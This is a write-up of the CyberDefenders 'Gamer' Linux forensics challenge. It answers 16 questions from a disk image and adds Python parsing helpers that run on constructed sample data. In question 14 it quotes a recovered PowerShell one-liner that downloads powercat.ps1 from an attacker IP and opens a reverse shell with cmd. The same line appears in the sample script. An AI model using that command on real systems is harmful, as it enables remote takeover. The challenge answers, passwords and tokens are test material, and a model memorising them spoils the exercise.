
Information
Category Name: Mr.Gamer
Files: c77-linux.zip 14.55 GB
  └ "2022 CTF - Linux.7z" 14.55 GB
Since the file is large, I recommend either sharing a folder with your VM or using an external drive.
My Recommendations
Download it from CyberDefenders and verify the file with sha1sum:
sha1sum /path/to/c77-linux.zip
SHA1: 62aa7c7d4fcd3f442365b1d7aa6b12a77e244627
This is my personal preference: I like being organized and deleting a folder when I'm done with it.
mkdir Documents/CyberDefenders/Gamer && cd Documents/CyberDefenders/Gamer
sudo ewfmount /path/to/LenovoFinal.E01 /mnt/ewf
sudo mount -o ro,noload,offset=537919488 /mnt/ewf/ewf1 /mnt/Linux
Both mount points (/mnt/ewf and /mnt/Linux) must exist beforehand. The offset is the start sector of the root partition multiplied by the 512-byte sector size (1050624 × 512 = 537919488); fdisk -l /mnt/ewf/ewf1 or mmls will show the partition table if you need to derive it yourself. ro keeps the evidence untouched and noload stops ext4 from replaying the journal when the filesystem is mounted.
Walkthrough
1: What is the name of the utility/library the user was looking at exploits for?
The question asks what the user is looking for, so we can take a look at Browser History:
sudo find /mnt/Linux -name "places.sqlite" -o -name "History"
This returns two places.sqlite databases, one for Firefox and one for Thunderbird:
We can copy both, although the information is almost certainly in the Firefox history. If a places.sqlite-wal file sits next to either database, copy it as well, otherwise the most recent visits may be missing:
cp /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/places.sqlite thunderbird-places.sqlite
cp /mnt/Linux/home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default/places.sqlite ff-places.sqlite
sqlitebrowser ff-places.sqlite
In the moz_places table, filter the url column for google.com/search?. Plenty of hacking and exploit topics were searched for, but the user specifically looked for log4j exploits:
Answer: log4j
2: What is the version ID number of the operating system on the machine?
Looking at /etc/issue (or /etc/os-release, whose VERSION_ID field is exactly what the question asks for):
cat /mnt/Linux/etc/issue
Answer: 21.10
3: What is the hostname of the computer?
We can find this information in /etc/hosts (and in /etc/hostname, which is the authoritative source):
cat /mnt/Linux/etc/hosts
Answer: rshell-lenovo
4: What is one anime that the user likes?
The question title is "A little blue birdie told me", so it refers to Twitter. We can grep for both strings in Rafael's home directory to identify candidate files:
grep -r -i 'anime' /mnt/Linux/home/rafael | grep -i twitter
All the links in the Thunderbird INBOX are essentially the same: a status from an anime account. Now, grepping for the exact link:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'https://twitter.com/AnimeShots___/status/148959235968=' -B 10 -A 10
To validate this, we can grep for "Attack On Titan":
grep -r -s -l -F 'Attack On Titan' /mnt/Linux
Outside the Thunderbird directory there is a match in Firefox's notificationstore.json:
The fact that Rafael received a push notification about this topic pretty much confirms his love for Attack On Titan.
Answer: Attack on Titan
5: What is the UUID for the attacker's Minecraft account?
There is a .minecraft folder in the user's home directory. The player's name and UUID are cached in usercache.json:
jq . /mnt/Linux/home/rafael/.minecraft/usercache.json
Answer: 8b0dec19-b463-477e-9548-eef20c861492
6: What VPN client did the user install and use on the machine?
Looking at dpkg.log, zerotier-one was installed on the machine. Keep in mind that dpkg.log only records Debian packages: anything installed as a snap (like the Firefox on this image) will not appear in it, and older entries rotate into dpkg.log.1 and compressed siblings.
grep -F 'status installed' /mnt/Linux/var/log/dpkg.log | sed 's/^.*status installed //' | sort -u
On top of that, the Firefox history shows that the user searched for ZeroTier, downloaded it and signed in:
Answer: zerotier
7: What was the user's first password for the guest wifi?
Guest Wi-Fi credentials are usually sent by email, so the Thunderbird INBOX is the place to look:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5
The guest Wi-Fi network is ChamplainGuest, and this is the template email that is sent with each set of credentials.
To find the first password, we need to find the oldest expiry date:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5 | grep -F 'Account expires'
The oldest date is Friday, January 28, 2022 17:01, so we search for that and read the password from the surrounding lines:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'Friday, January 28, 2022 17:01' -B 10
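The strings | grep approach works, but the INBOX file is a standard mbox, so the same search can be scripted with Python's standard library and the results sorted by the Date header instead of by eyeballing expiry dates. The example below is added here and is not part of the original write-up. Its sample mbox is constructed, and the body field names it matches on (Account expires:, Password:) are an assumption about the template; adjust the two regular expressions if the real emails differ.

```python
import mailbox
import re
import tempfile
from email.utils import parsedate_to_datetime

# Thunderbird's ImapMail/<server>/INBOX file is a plain mbox, so the stdlib mailbox
# module can walk it instead of strings | grep. The body field names below
# ("Account expires:" and "Password:") are assumptions about the template.
EXPIRES_RE = re.compile(r"Account expires:\s*(.+)")
PASSWORD_RE = re.compile(r"Password:\s*(\S+)")


def message_text(msg):
    """Best-effort plain text of a message (first text/plain part, or the body)."""
    if msg.is_multipart():
        for part in msg.walk():
            if part.get_content_type() == "text/plain":
                charset = part.get_content_charset() or "utf-8"
                return part.get_payload(decode=True).decode(charset, "replace")
        return ""
    charset = msg.get_content_charset() or "utf-8"
    return msg.get_payload(decode=True).decode(charset, "replace")


def guest_credentials(mbox_path, ssid="ChamplainGuest"):
    """Return [(sent, expires_text, password)] for every guest-WiFi mail, oldest first."""
    found = []
    for msg in mailbox.mbox(mbox_path):
        body = message_text(msg)
        if ssid not in body:
            continue
        exp = EXPIRES_RE.search(body)
        pw = PASSWORD_RE.search(body)
        if exp and pw:
            found.append((parsedate_to_datetime(msg["Date"]), exp.group(1).strip(), pw.group(1)))
    return sorted(found)  # sorted by the Date header, so [0] is the first password


def first_guest_password(mbox_path):
    creds = guest_credentials(mbox_path)
    return creds[0][2] if creds else None


# Constructed sample mailbox: two guest-WiFi mails (out of order) and one unrelated mail.
SAMPLE_MBOX = """\
From MAILER-DAEMON Wed Feb 09 09:00:00 2022
From: it-help@example.edu
To: rafael@example.com
Date: Wed, 09 Feb 2022 09:00:00 -0500
Subject: Your ChamplainGuest access

Network: ChamplainGuest
Username: guest-2
Password: 222222
Account expires: Wednesday, February 9, 2022 14:00

From MAILER-DAEMON Tue Feb 01 10:00:00 2022
From: newsletter@example.com
To: rafael@example.com
Date: Tue, 01 Feb 2022 10:00:00 -0500
Subject: Unrelated

Nothing about wifi here.

From MAILER-DAEMON Fri Jan 28 12:00:00 2022
From: it-help@example.edu
To: rafael@example.com
Date: Fri, 28 Jan 2022 12:01:00 -0500
Subject: Your ChamplainGuest access

Network: ChamplainGuest
Username: guest-1
Password: 093483
Account expires: Friday, January 28, 2022 17:01
"""


def write_sample_mbox():
    """Write the constructed mbox to a temp file and return its path."""
    f = tempfile.NamedTemporaryFile("w", suffix=".mbox", delete=False)
    f.write(SAMPLE_MBOX)
    f.close()
    return f.name


if __name__ == "__main__":
    # Against the image, point this at a copy of .thunderbird/<profile>/ImapMail/imap.gmail.com/INBOX
    path = write_sample_mbox()
    for sent, expires, pw in guest_credentials(path):
        print(sent.isoformat(), expires, pw)
    print("first password:", first_guest_password(path))
```

Copy the INBOX file out of the read-only mount before working on it. Note that a Thunderbird mbox can still hold messages that were deleted but not yet compacted, which is one reason the raw strings approach can surface text the mail client no longer shows; this parser sees those too, as long as their headers are intact.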
Answer: 093483
8: The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?
In the Firefox places.sqlite database, this SQL query joins each URL with its visit timestamps so we can find the YouTube video watched on February 9th:
SELECT
  moz_places.id AS Id,
  moz_places.url,
  moz_places.title,
  moz_places.description,
  datetime(moz_historyvisits.visit_date / 1000000, 'unixepoch', 'localtime') AS VisitDate
FROM moz_places
LEFT JOIN moz_historyvisits ON moz_historyvisits.place_id = moz_places.id
ORDER BY VisitDate DESC;
Then save it as a view and filter url for youtube and VisitDate for 2022-02-09. One caveat: 'localtime' converts the UTC timestamp into the time zone of the analysis machine, not the user's. Either work in UTC or make sure your analysis box uses the same zone as the image (see /etc/timezone on the mounted partition) before trusting a day boundary:
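The same history analysis can be scripted rather than clicked through in DB Browser. The Python example below is added here and is not part of the original write-up: it builds a small constructed stand-in for places.sqlite (the moz_places and moz_historyvisits tables with the columns used above), pulls the q= term out of every Google search URL (the step used for question 1) and lists YouTube visits on a given UTC day by converting Firefox's PRTime microseconds. The sample URLs, titles and timestamps are invented; point sqlite3.connect at the copied ff-places.sqlite to run it against the real history.

```python
import sqlite3
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Firefox stores visit_date as PRTime: microseconds since the Unix epoch, in UTC.
PRTIME_PER_SECOND = 1_000_000


def prtime_to_utc(prtime):
    """Convert a Firefox PRTime value to an aware UTC datetime."""
    return datetime.fromtimestamp(prtime / PRTIME_PER_SECOND, tz=timezone.utc)


def google_searches(conn):
    """Return (utc_visit, query) pairs for every Google search in the history, oldest first."""
    rows = conn.execute("""
        SELECT h.visit_date, p.url
        FROM moz_historyvisits AS h
        JOIN moz_places AS p ON p.id = h.place_id
        WHERE p.url LIKE 'https://www.google.com/search?%'
        ORDER BY h.visit_date
    """).fetchall()
    out = []
    for visit_date, url in rows:
        query = parse_qs(urlsplit(url).query).get("q", [""])[0]
        out.append((prtime_to_utc(visit_date), query))
    return out


def youtube_visits_on(conn, day):
    """(place id, url, title, utc_visit) for YouTube videos visited on a UTC day ('YYYY-MM-DD')."""
    rows = conn.execute("""
        SELECT p.id, p.url, p.title, h.visit_date
        FROM moz_historyvisits AS h
        JOIN moz_places AS p ON p.id = h.place_id
        WHERE p.url LIKE '%youtube.com/watch%'
          AND date(h.visit_date / 1000000, 'unixepoch') = ?
        ORDER BY h.visit_date
    """, (day,)).fetchall()
    return [(pid, url, title, prtime_to_utc(vd)) for pid, url, title, vd in rows]


def build_sample_db():
    """Constructed stand-in for places.sqlite with only the two tables the queries use."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT, description TEXT);
        CREATE TABLE moz_historyvisits (id INTEGER PRIMARY KEY, place_id INTEGER, visit_date INTEGER);
    """)

    def prtime(iso_utc):
        dt = datetime.fromisoformat(iso_utc).replace(tzinfo=timezone.utc)
        return int(dt.timestamp()) * PRTIME_PER_SECOND

    # Invented rows: two Google searches and two YouTube visits on different days.
    places = [
        (1, "https://www.google.com/search?q=log4j+exploit&client=firefox", "log4j exploit - Google Search", None),
        (2, "https://www.google.com/search?q=zerotier+download", "zerotier download - Google Search", None),
        (3, "https://www.youtube.com/watch?v=EXAMPLE1", "Some premiere", "Premiered Dec 11, 2021"),
        (4, "https://www.youtube.com/watch?v=EXAMPLE2", "Unrelated video", None),
    ]
    visits = [
        (1, 1, prtime("2022-02-08T15:03:00")),
        (2, 2, prtime("2022-02-08T15:10:00")),
        (3, 3, prtime("2022-02-09T21:42:00")),
        (4, 4, prtime("2022-02-10T03:00:00")),
    ]
    conn.executemany("INSERT INTO moz_places VALUES (?, ?, ?, ?)", places)
    conn.executemany("INSERT INTO moz_historyvisits VALUES (?, ?, ?)", visits)
    return conn


if __name__ == "__main__":
    # Against the real copy: conn = sqlite3.connect("file:ff-places.sqlite?mode=ro", uri=True)
    conn = build_sample_db()
    for when, query in google_searches(conn):
        print(when.isoformat(), query)
    for pid, url, title, when in youtube_visits_on(conn, "2022-02-09"):
        print(pid, when.isoformat(), title, url)
```

The queries deliberately stay in UTC. When deciding which calendar day a visit belongs to, apply the image's own time zone (from /etc/timezone on the mounted partition) rather than whatever the analysis machine happens to use.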
Opening the links in a browser shows YouTube's information: the video with Id 176 premiered on December 11th, 2021. The Wayback Machine has no capture to tell us the view count on the 9th, but Rafael's Pictures directory contains three screenshots dated February 9th.
The three screenshots show two different view counts: at 17:31 and 17:42 the video had 265,355 views,
while at 16:42 it had 265,342 views:
It is not obvious which value to submit; the accepted answer is the one from the earliest (16:42) screenshot.
Answer: 265342
9: What is the new channel name for the YouTuber whose cookbook is shown on the device?
In Rafael's home directory there is a folder named marshalsec that contains everything related to the log4j exploit. Its poc subfolder holds screenshots, which we can open in bulk with ImageMagick's display:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file aaGkBJdu.jpeg is a screenshot showing a Binging with Babish cookbook:
Searching for it on YouTube shows that the channel is now named Babish Culinary Universe:
Answer: Babish Culinary Universe
10: What is the module with the highest installed version for the chat application with the mascot Wumpus?
The chat application in question is Discord. We can check its directory to identify potential files:
ls -la /mnt/Linux/home/rafael/.config/discord
The first directory, 0.0.16, is the client version directory; its modules subdirectory contains installed.json, which records the installed version of each module:
jq . /mnt/Linux/home/rafael/.config/discord/0.0.16/modules/installed.json
The highest installed version is for the discord_voice module:
Answer: discord_voice
11: According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?
This question is answered by the screenshots in the marshalsec/poc directory, which were clearly taken on the Windows victim's machine. Using the same command as before to open the images in bulk:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file marshalsec/poc/YXvySdGd.jpeg matches the timestamp:
The temperature was 45 °F.
Answer: 45F
12: What is the upload date of the second youtube video on the channel from which the user downloaded a youtube video?
Looking at the Downloads directory, there is a .wav file:
ls -la /mnt/Linux/home/rafael/Downloads
We can use exiftool to read the metadata that records where the file was downloaded from:
exiftool /mnt/Linux/home/rafael/Downloads/'Rick Astley - Never Gonna Give You Up (Official Music Video).wav'
Opening the link in a browser and looking at Rick Astley's upload history, the second video is "Whenever You Need Somebody":
Which was uploaded on October 25th, 2009:
Answer: 10/25/2009
13: What is the SHA-1 hash of Minecraft's "latest" release according to the system?
This question literally took me YEARS to solve. In the .minecraft/versions directory there is a file named version_manifest_v2.json:
jq . /mnt/Linux/home/rafael/.minecraft/versions/version_manifest_v2.json
The first element shows the latest release as 1.18.1 and the latest snapshot as 22w06a:
For some reason I was convinced that the hashes in the file were irrelevant, since they are hashes of the per-version JSON files and not of the actual executable or release. So I spent a lot of time looking up and trying all sorts of hashes related to this specific version. However, the correct answer was right under my nose: the sha1 field of the versions[] entry whose id matches latest.release.
Answer: 3c6e119c0ff307accf31b596f9cd47ffa2ec6305
14: What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was "powercat -D Y -l a -n," the answer would be "-D Y -l a -n")
In marshalsec/poc/ there is a powercat.ps1 file, but nothing there proves it was executed. We can grep the whole partition for the filename:
sudo grep -r -s -l -F 'powercat.ps1' /mnt/Linux
#returns /mnt/Linux/swapfile and /mnt/Linux/home/rafael/.bash_history
strings /mnt/Linux/home/rafael/.bash_history | grep powercat -B 5 -A 5
The bash history only shows the script being downloaded:
So we check the swapfile. -a scans the whole file, -td prints decimal offsets, and -el makes strings look for 16-bit little-endian (UTF-16LE) characters, which is how this command turned up:
sudo strings -a -td -el /mnt/Linux/swapfile | grep 'powercat' -B 5 -A 5
and here is the full command:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.191.253:8000/powercat.ps1');powercat -c 192.168.191.253 -p 4444 -e cmd"
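Since strings -el is what made the command visible, it is worth seeing why: the text was stored as UTF-16LE, which a plain ASCII scan skips entirely. The Python example below is added here and is not part of the original write-up. It runs both scans over a constructed byte buffer that mimics the two findings above (the wget line from .bash_history in plain ASCII and the PowerShell one-liner encoded as UTF-16LE) and parses the powercat flags into exactly the format the question asks for. The filler bytes are invented; to run the same logic on the real evidence, mmap /mnt/Linux/swapfile instead of reading it into memory and pass the mapping to the scan functions.

```python
import re

# `strings -el` looks for 16-bit little-endian characters; these two patterns do the
# same job in Python so the scan can be scripted and the hit parsed instead of eyeballed.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")


def ascii_strings(blob):
    """(offset, text) for printable ASCII runs, like plain `strings -td`."""
    return [(m.start(), m.group().decode("ascii")) for m in ASCII_RUN.finditer(blob)]


def utf16le_strings(blob):
    """(offset, text) for printable UTF-16LE runs, like `strings -td -el`."""
    return [(m.start(), m.group().decode("utf-16-le")) for m in UTF16LE_RUN.finditer(blob)]


def powercat_flags(command):
    """Return the flags passed to powercat ('-c host -p port -e cmd'), or None.

    Stops at ; or a quote so the enclosing `powershell -c "..."` wrapper is ignored,
    and requires whitespace after 'powercat' so 'powercat.ps1' in a URL does not match.
    """
    m = re.search(r"\bpowercat\s+(-[^;\"']*)", command)
    return " ".join(m.group(1).split()) if m else None


def find_powercat_invocations(blob):
    """Scan both encodings and return (offset, flags) for every powercat call found."""
    hits = []
    for offset, text in ascii_strings(blob) + utf16le_strings(blob):
        flags = powercat_flags(text)
        if flags:
            hits.append((offset, flags))
    return hits


# Constructed stand-in for a swapfile excerpt. The attacker command is the one recovered
# in the walkthrough; the wget line mimics what .bash_history showed; the filler is invented.
ATTACK_CMD = ('powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('
              "'http://192.168.191.253:8000/powercat.ps1');"
              'powercat -c 192.168.191.253 -p 4444 -e cmd"')
SAMPLE_SWAP = (b"\x00\xff" * 32
               + b"wget http://192.168.191.253:8000/powercat.ps1\n"
               + b"\x00\xff" * 32
               + ATTACK_CMD.encode("utf-16-le")
               + b"\x00\xff" * 32)


if __name__ == "__main__":
    print("ASCII only:", [t for _, t in ascii_strings(SAMPLE_SWAP)])
    print("UTF-16LE:  ", [t for _, t in utf16le_strings(SAMPLE_SWAP)])
    for offset, flags in find_powercat_invocations(SAMPLE_SWAP):
        print(f"powercat flags at offset {offset}: {flags}")
```

The ASCII pass only finds the download line, which is exactly what .bash_history told us; the UTF-16LE pass is the one that recovers the full command, the same way the -el switch did.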
Answer: -c 192.168.191.253 -p 4444 -e cmd
15: How many dimensions (including the overworld) did the player travel to in the "oldest of the worlds"?
Another question I spent hours on, since I know nothing about Minecraft.
The three dimensions in Minecraft are the Overworld, the Nether and the End. First, let's identify the "oldest of the worlds". Player worlds are saved under saves:
ls -la /mnt/Linux/home/rafael/.minecraft/saves
So the world is New World. Then I tried everything: I extracted the .mca files and parsed the .dat files, but found nothing. So I used the hints, which pointed to the advancements directory. It contains only one file, named after the player's UUID: 8b0dec19-b463-477e-9548-eef20c861492.json. A little googling took me here.
Essentially, if the player had travelled to the End or the Nether, advancements with IDs starting with minecraft:nether/ or minecraft:end/ would be present (minecraft:nether/root and minecraft:end/root are granted simply for arriving in those dimensions). So we list the advancement IDs in the JSON file:
jq . /mnt/Linux/home/rafael/.minecraft/saves/'New World'/advancements/8b0dec19-b463-477e-9548-eef20c861492.json | grep minecraft -B 1
None of these start with minecraft:end/ or minecraft:nether/, so the player must have stayed in the Overworld.
Answer: one
16: What is the mojangClientToken stored in the Keystore?
This one took time, but since the keyring password (Matrix_1999) is provided, it was much easier than I expected.
First, letās find the keystore:
sudo find /mnt/Linux -name "*.keystore"
#returns /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore
Then I copied Rafael's keystore into my own keyrings directory under a new name:
cp /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore /home/remnux/.local/share/keyrings/rafael.keystore
I then opened the Passwords and Keys app (Seahorse) on my machine. A new "Login" keyring had appeared, so I unlocked it with the password Matrix_1999:
Double-clicking mojangClientToken, choosing Copy (the secret itself is hidden in the UI) and pasting into a terminal gives its value, 2f76c8b04c004ddd888a05a6cad6be52.
Answer: 2f76c8b04c004ddd888a05a6cad6be52
TLDR
Just a boy playing around with Log4j